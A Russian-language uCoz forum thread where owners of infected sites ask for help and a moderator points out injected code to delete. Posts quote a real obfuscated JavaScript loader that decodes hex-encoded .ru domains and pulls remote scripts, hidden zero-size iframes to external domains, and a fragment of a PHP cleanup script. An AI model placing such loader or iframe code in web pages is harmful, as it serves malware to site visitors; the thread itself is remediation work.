Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика) |
| Вирусы на сайтах |
|
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
|
Вирус на серии сайтов. 2 моих сайта: питомник и форум+ сайт моего друга:
breenbrass.narod.ru basset.at.ua donbasset.at.ua На всех трех сайтах с мобильных версий вообще не зайдешь: на всех видах моб устройств страница орет что данный сайт заражен вирусом! На сайте моего форума даже на компе выдает зараженный сайт и блокирует его! В любых браузерах и с любых компьютеров с разными анти вирусами! basset.at.ua Посещаемость упала до нуля! Кто то поможет? Спасибо заранее... Прикрепления:
9307621.jpg
(138.6 Kb)
|
|
breenbrass, зайдите в редактирование этого материала в хтмл режиме http://basset.at.ua/news/world_dog_show_2015_milan_italy/2015-09-28-11 и удалите
Код <script>window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("basset.at.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe id="a1996667054" src="https://bw95vpjda.ru/f.html" style="display: none;"></iframe> форум не вижу без регистрации на счет мобильных версий нужен скрин как орет и что именно орет |
|
Здравствуйте! Есть несколько сайтов на юкоз.
Сегодня пропали ссылки из поисковой выдачи яндекса, сайт просто исчез из поиска (и не один). В яндекс вебмастере(бета) показывает что у меня ошибка на сайте, и за счет этого будут ограничения в ранжировании. Проверил в шаблоне не обнаружил скриптов которые могут влият на ПС. Сайт: http://video-futazhi.ru/ Неужели это из-за того что стоит реклама мобильная (вирусная агрессивная реклама) от Юкоза, и придется на все мои 20 сайтов ставить базовый пакет и платить почти 8 тысяч рублей в месяц (что бы сохранить сайты)? а дохода то особо нет с этих сайтов, за исключением нескольких (да и то копейки). Или же это дело не Юкоза, а дело рук поисковых роботов яндекса которые могут ошибаться? Неужели придется класть на сайты которые будет невозможно развивать, из-за реклам которые вводят в заблуждение посетителей сайта по мнение ПС. вот скрин:  Сообщение отредактировал Voess - Вторник, 31 Май 2016, 17:40:14
|
|
Voess, нажмите возле нашлось 6 проблем - 1 фатальная. там будут подробности. выложите сюда скрин страницы
Цитата Неужели это из-за того что стоит реклама мобильная (вирусная агрессивная реклама) от Юкоза но сначала скрин. |
|
Данное нарушение до сих пор на месте, но в поиске сайт появился через несколько часов, все равно это настораживает, до этого трафик падал. По запросам тоже позиции падали, но сейчас какое то чудо и снова сайт на своих позициях. Только вот как я понимаю только пользователи через пк могут заходит,ь, а с телефона уже не могут
.  А по поводу рекламы, рекломодатель из компании адвмейкер которые на рынке очень давно, и не думаю, что дело в них. Прикрепления:
6561399.png
(43.4 Kb)
Сообщение отредактировал Voess - Вторник, 31 Май 2016, 23:03:05
|
|
webanet, Спасибо огромное за незамедлительный ответ!
 Все получилось  Не подскажите, откуда этот фрэйм прописаться мог?Сообщение отредактировал breenbrass - Среда, 01 Июн 2016, 16:07:21
|
|
Здравствуйте!. Школьный сайт gimnasium-150.ucoz.ru Блокируется. Причину сами найти не можем. Помогите, пожалуйста
|
|
Светлана8426, из шаблона информера пользователей (который выводит кодличество админов, пользователей и т.д) удалите
Код <iframe src="http://ga1.net.ru/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe> |
|
Подскажите пожалуйста антивирусная проверка нашла вирус в коде http://www.gimnasiun-150.ucoz.ru
хотя гугл и яндекс реагируют нормально, а АВАСТ пишет: На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код. |
|
webanet, из статистики я удалила, но меня Аваст материт с прежним интузиазмом
|
|
Светлана8426, скрин мата аваста выдайте
|
|
Светлана8426, панель управления - редактор страниц - управление страницами сайта - главная страница - напротив главной нажмите на разводной ключ - страница откроется на редактирование - удалите оттуда два раза эту конструкцию
Код <!--?php // iframe удалятор от GlooSoftware.ws $virus_start = 'try{q=document.createElement'; //начало вредоносного кода $virus_end = 'q=ss;e(q);}'; //конец вредоносного кода $skip_files = array ('clean.php'); //название файла - который следует проигнорировать при проверке $del = true; //лечим(true) или просто смотрим кол-во зараженных файлов(false) $dir = getcwd().'/'; //корень сайта $num_infected = 0; function dir_walk($callback, $dir, $types = null, $recursive = false, $baseDir = '') { if ($dh = opendir($dir)) { while (($file = readdir($dh))!== false) { if ($file === '.' || $file === '..') { continue; } if (is_file($dir . $file)) { if (is_array($types)) { if (!in_array(strtolower(pathinfo($dir . $file, PATHINFO_EXTENSION)), $types, true)) { continue; } } $callback($baseDir, $file); }elseif($recursive && is_dir($dir . $file)) { dir_walk($callback, $dir . $file . DIRECTORY_SEPARATOR, $types, $recursive, $baseDir . $file . DIRECTORY_SEPARATOR); } } closedir($dh); } } function del_virus($fdir, $ffile) { $flag = false; $filename = $fdir.$ffile; echo $filename; $file=file($filename); foreach($file as $k=--> |
|
Добрый день!
Яндекс-браузер помечает сайт как опасный. В Вебмастере информация: Как с этим бороться? Спасибо!  Прикрепления:
2506992.jpg
(126.5 Kb)
|
|
Vlad_A, ищите на форуме ссылку на сторонний сайт, который указал яндекс. адрес сайта, который нужно искать в сообщениях начинается со знака вопроса в примере яндекса
|
| |||